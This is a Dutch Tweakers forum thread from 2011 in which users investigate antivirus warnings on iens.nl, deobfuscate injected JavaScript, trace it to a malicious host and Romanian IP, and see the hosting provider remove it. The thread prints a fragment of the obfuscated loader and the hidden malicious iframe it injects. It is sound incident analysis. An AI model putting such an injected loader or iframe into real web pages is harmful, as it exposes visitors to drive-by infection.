Toon posts:

Trojan op www.iens.nl of false positive?

Pagina: 1
Acties:

  • Dr. Cheeks
  • Registratie: oktober 2000
  • Laatst online: 14-11 13:31
Sinds vanochtend geeft Kaspersky Anti-Virus (zakelijke variant) een waarschuwing bij het bezoeken van
code:
1
www.iens.nl
. Er zou een iframe zijn met een trojan ('HEUR:Trojan.Script.Iframer').

Is dit een false-positive, of zien jullie ook gekke dingen op iens? Iens is toch een van de grotere Nederlandse sites... zou wat zijn als die gehackt is!

(Mijn gebruikers schreeuwen dat ze bij iens willen, maar ik houdt het nog even op slot totdat er meer duidelijk is... >:) )

[Voor 0% gewijzigd door iisschots op 13-07-2011 11:38. Reden: Mogelijk gevaarlijke sites zetten we altijd tussen code tags]


  • Rolfie
  • Registratie: oktober 2003
  • Laatst online: 09:31
Ik krijg ook een trojan melding.

Is dus iets niet goed op de site.

  • Burner NL
  • Registratie: november 2002
  • Laatst online: 19-11 23:00
Met Avast Home krijg ik geen melding over een mogelijke trojan.

  • Zarathustra
  • Registratie: januari 2008
  • Laatst online: 28-04-2020
NOD32 klaagt ook. Heb wat javascript uit de quarantaine gehaald en dat ziet er zo uit:

code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
q = "v";
ww = Number.MAX_VALUE;

el = document.getElementsByTagName("di" + q)[0]; // Haalt de eerste div op, hierin staat een enorme cijferreeks

try {

    if (isFinite(ww) && !isFinite(ww * 1.5))
        throw 'xtNode';

} catch (qweqwe) {

    with ({
        a : 'createTe'
    }) {

        k = document[a + qweqwe]("eval"); // oftewel document[createTextNode]("eval")

    }

}


Commentaar is van mij. Code gaat nog een stukje verder zo. Op z'n minst erg dubieus.

Veni, vidi, vici - ik kwam, zag en overwon de drempels van het leven - denk ik dan maar, en vond vriendschap


  • jopitan
  • Registratie: juni 2007
  • Laatst online: 22-11 20:35

jopitan

It's just a fact

Krijg geen melding met Norman Security Suite, ook geen rare code op de website te zien ofzo.

CPU: i7-5820K @ 4.4GHz | CCooler: NZXT Kraken X61 | MEM: Kingston 16GB @ 2666MHz | GPU: RX470 | PSU: OCZ 1250W | SSD: Samsung Pro 500GB


  • hhoekstra
  • Registratie: maart 2008
  • Laatst online: 03-12 14:02
Van nod32 krijg ik door dat de volgende website geblokkeerd is:
** laat maar is oudere melding :P

Edit: deze melding krijg ik

[Voor 104% gewijzigd door hhoekstra op 13-07-2011 20:49]


  • InFamous
  • Registratie: januari 2010
  • Nu online

InFamous

excommunicado

Hier ook een melding van Mircosoft Security Essentials, 1 mogelijke dreiging gevonden. Vervolgens probeert de site bij mij in iedergeval een soort van pdf bestand te openen acrobat start op maar kan niks ontvangen omdat dit geblokkeerd word door MSE. Misschien tijd om de berheerders van de website op de hoogte te stellen.

De website probeert inderdaad een pdf bestand te openen wat besmet is. file C:\users\xxxx\appdata\local\microsoft\windows\temporary internet files\content.ie5\wryxh43r\cda0[1].pdf
De trojaan staat bekend onder de naar Win32/Pfdjsc.RF

[Voor 27% gewijzigd door InFamous op 13-07-2011 20:48]

Formerly known as Ragdoll


  • jopitan
  • Registratie: juni 2007
  • Laatst online: 22-11 20:35

jopitan

It's just a fact

Ah vandaar, ik heb adblocker :)

CPU: i7-5820K @ 4.4GHz | CCooler: NZXT Kraken X61 | MEM: Kingston 16GB @ 2666MHz | GPU: RX470 | PSU: OCZ 1250W | SSD: Samsung Pro 500GB


Anoniem: 26306

Krijgen jullie meldingen op specifieke bestanden? Graag een (enigszins defecte) link indien mogelijk :)

  • EDIT
  • Registratie: januari 2007
  • Laatst online: 19:05
Jup, op een .be domein:

Virusmelding Iens

  • Zarathustra
  • Registratie: januari 2008
  • Laatst online: 28-04-2020
Ik heb de unpacker even gedraaid zonder daadwerkelijk iets uit te voeren. In de uitgepakte JS wordt verwezen naar onder andere dit ip-adres 91.208.142.55, java applets op ./games/worms.jar maar zonder direct zichtbaar domein en pogingen om PDF's te openen.

Zeker malware dus.

Veni, vidi, vici - ik kwam, zag en overwon de drempels van het leven - denk ik dan maar, en vond vriendschap


  • HenkEisjedies
  • Registratie: maart 2004
  • Laatst online: 18:38
Direct contact opnemen met iens en een mailtje sturen naar abuse@iens.nl en info@iens.nl

  • Sharky_NL
  • Registratie: juni 2007
  • Laatst online: 20-11 21:12
En als je het ip adres opzoekt komt je uit in Roemenie. :(

  • jopitan
  • Registratie: juni 2007
  • Laatst online: 22-11 20:35

jopitan

It's just a fact

Ik weet niet hoe het met jullie zit maar ik kan helemaal niks terug vinden in de broncode van het IP 91.208.*.* of het domein naam ervan. Ik zie wel een eval(function(p,a,c,k,e,r)) erin staan maar dat lijkt me sterk dat dat hem is.

CPU: i7-5820K @ 4.4GHz | CCooler: NZXT Kraken X61 | MEM: Kingston 16GB @ 2666MHz | GPU: RX470 | PSU: OCZ 1250W | SSD: Samsung Pro 500GB


  • JJ Le Funk
  • Registratie: januari 2004
  • Niet online
kaspersky internet security 2012 geeft dezelfde waarschuwing als bij TS (zakelijke editie).

~


  • wlchris
  • Registratie: juni 2007
  • Laatst online: 18:03
jopitan schreef op woensdag 13 juli 2011 @ 21:12:
Ik weet niet hoe het met jullie zit maar ik kan helemaal niks terug vinden in de broncode van het IP 91.208.*.* of het domein naam ervan. Ik zie wel een eval(function(p,a,c,k,e,r)) erin staan maar dat lijkt me sterk dat dat hem is.
Dat is hem, hier de raw output.

http://jsunpack.jeek.org/...6eb677dba1373c579ac345483

  • JJ Le Funk
  • Registratie: januari 2004
  • Niet online
op dat IP lijkt een reversed proxy te draaien

~


Anoniem: 26306

Correct, de hostname staat er ook achterstevoren in. Een grep had hem al gevonden. Nasty little bugger...

  • Zarathustra
  • Registratie: januari 2008
  • Laatst online: 28-04-2020
Die link naar jsunpack geeft een ander bestand en foutmelding dan ik krijg. Deze inderdaad Iframe.B.Gen virus. Op iens.nl krijg ik JS/Kryptik.BB trojan.

Vermoedelijk door het volgen van die link is nu mijn Firefox sessionstore.js besmet en krijg ik continue meldingen van NOD32. Klikken op eigen risico dus ;)

Veni, vidi, vici - ik kwam, zag en overwon de drempels van het leven - denk ik dan maar, en vond vriendschap


Anoniem: 26306

Wil iedereen s.v.p. zijn/haar cache leegmaken en de browser herstarten? De code staat inmiddels niet meer op de homepage, dus als het goed is komen er geen nieuwe meldingen meer.

[Voor 7% gewijzigd door Anoniem: 26306 op 13-07-2011 21:38]


  • Timv37
  • Registratie: augustus 2008
  • Laatst online: 15:27
NOD32 nu schoon hier :)

  • Schouw
  • Registratie: mei 2002
  • Niet online
Anoniem: 26306 schreef op woensdag 13 juli 2011 @ 21:36:
Wil iedereen s.v.p. zijn/haar cache leegmaken en de browser herstarten? De code staat inmiddels niet meer op de homepage, dus als het goed is komen er geen nieuwe meldingen meer.
Niet vergeten het daadwerkelijke lek te fixen. ;)

Anoniem: 26306

Schouw schreef op woensdag 13 juli 2011 @ 21:39:

Niet vergeten het daadwerkelijke lek te fixen. ;)
Dat laat ik over aan de developers van IENS, ik werk slechts voor hun hosting provider ;)

  • Thralas
  • Registratie: december 2002
  • Nu online
Ik hoop dat die scanners van jullie context-aware zijn. Zoniet, excuses.

De packed + obfuscated JS-code dropt een iframe:

code:
1
<iframe src="h_niet_doen_p://vawboman71.co.be/forum.php?tp=bc4453c0040c9021" width="0" height="0" style="visibility:hidden;position:absolute !important;left:-5000px !important;top:0px;"></iframe>


code:
1
2
3
4
5
6
7
8
Name:   vawboman71.co.be
Address: 91.208.142.55

inetnum:        91.208.142.0 - 91.208.142.255
netname:        SC-GAZDUIRE-WEB-SRL
descr:          Gazduire Web S.R.L.
org:            ORG-GWS1-RIPE
country:        RO


De pagina in 't iframe bevat weer obfuscated JS, welke deze obfuscated HTML/JS dropped: http://pastie.org/private/xkmrf6awcmzhdgyknjeig

Veel version detection van Acrobat/Java plugins & whatnot, maar ik zie alleen zo snel geen payload.. kijk ik eroverheen?

edit:
Misschien is dit gewoon een obfuscated tracker oid, en is de payload al weg?

[Voor 5% gewijzigd door Thralas op 13-07-2011 21:52]


  • Schouw
  • Registratie: mei 2002
  • Niet online
Yup. ;)
Genoeg malcode te vinden. Tread with caution.

Anoniem: 26306

Ik heb inmiddels een en ander kunnen traceren aan de hand van het tijdstip waarop er aanpassingen zijn geweest in combinatie met de logbestanden. Het lijkt er sterk op dat een paar Russische kameraden een aanval hebben uitgevoerd waarbij het kennelijk uiteindelijk is gelukt iets te uploaden en uit te voeren. Ik heb de complete log opgeslagen en opgestuurd naar IENS voor nader onderzoek.

Namens Proserve in elk geval bedankt voor het melden en helpen oplossen :)
Pagina: 1


Nintendo Switch (OLED model) Apple iPhone 13 LG G1 Google Pixel 6 Call of Duty: Vanguard Samsung Galaxy S21 5G Apple iPad Pro (2021) 11" Wi-Fi, 8GB ram Nintendo Switch Lite

Tweakers vormt samen met Hardware Info, AutoTrack, Gaspedaal.nl, Nationale Vacaturebank, Intermediair en Independer DPG Online Services B.V.
Alle rechten voorbehouden © 1998 - 2021 Hosting door True

Tweakers maakt gebruik van cookies

Bij het bezoeken van het forum plaatst Tweakers alleen functionele en analytische cookies voor optimalisatie en analyse om de website-ervaring te verbeteren. Op het forum worden geen trackingcookies geplaatst. Voor het bekijken van video's en grafieken van derden vragen we je toestemming, we gebruiken daarvoor externe tooling die mogelijk cookies kunnen plaatsen.

Meer informatie vind je in ons cookiebeleid.

Sluiten

Forum cookie-instellingen

Bekijk de onderstaande instellingen en maak je keuze. Meer informatie vind je in ons cookiebeleid.

Functionele en analytische cookies

Deze cookies helpen de website zijn functies uit te voeren en zijn verplicht. Meer details

janee

    Cookies van derden

    Deze cookies kunnen geplaatst worden door derde partijen via ingesloten content en om de gebruikerservaring van de website te verbeteren. Meer details

    janee